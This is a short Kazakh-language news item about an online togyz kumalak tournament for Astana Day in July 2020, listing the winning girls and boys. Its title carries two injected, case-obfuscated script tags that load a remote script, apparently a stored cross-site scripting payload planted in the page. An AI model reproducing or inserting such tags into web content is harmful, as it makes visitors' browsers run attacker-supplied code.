Турнир Астана күніне арналды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.07.2020

«Арман» МТОТЖО «Тоғызқұмалақ» секциясының шәкірттері әрдайым дайындықтарын пысықтап, шеберліктерін арттырып отырады. Осы орайда, секцияның қосымша білім беру педагогі Абылкасов Жұматай Базарұлының ұйымдастыруымен, ұлдар мен қыздар арасында 6-шілде күні Астана күніне онлайн-жарыс өтті.

Жарысқа қатысқан қыздар арасында Мұрат Жансая І орын алды. Абиева Ханшайым жүлделі ІІ орын иеленсе, Ахметжанова Жансия ІІІ орынға тұрақтады. Барлығы жарысқа 6 қыз қатысты.

Ұлдар арасындағы жарыс та тартысты өтті. Алты ұлдың арасында Нұрмаханбетов Нұрасыл мен Қажғалиев Темірлан тең ұпай жинап І орынға шықты. Нургалиев Нурамир мен Ермекұлы Асылжан да текетірес ойын көрсетіп, ІІ орынға ие болды. Шөкенов Жандос жүлделі ІІІ орынды қанжығасына байлады.

Жеңімпаздар мен жүлдегерлерді құттықтаймыз! 

Просмотров: 269


Пікір қосу



Деректерді қолтаңбаға қосу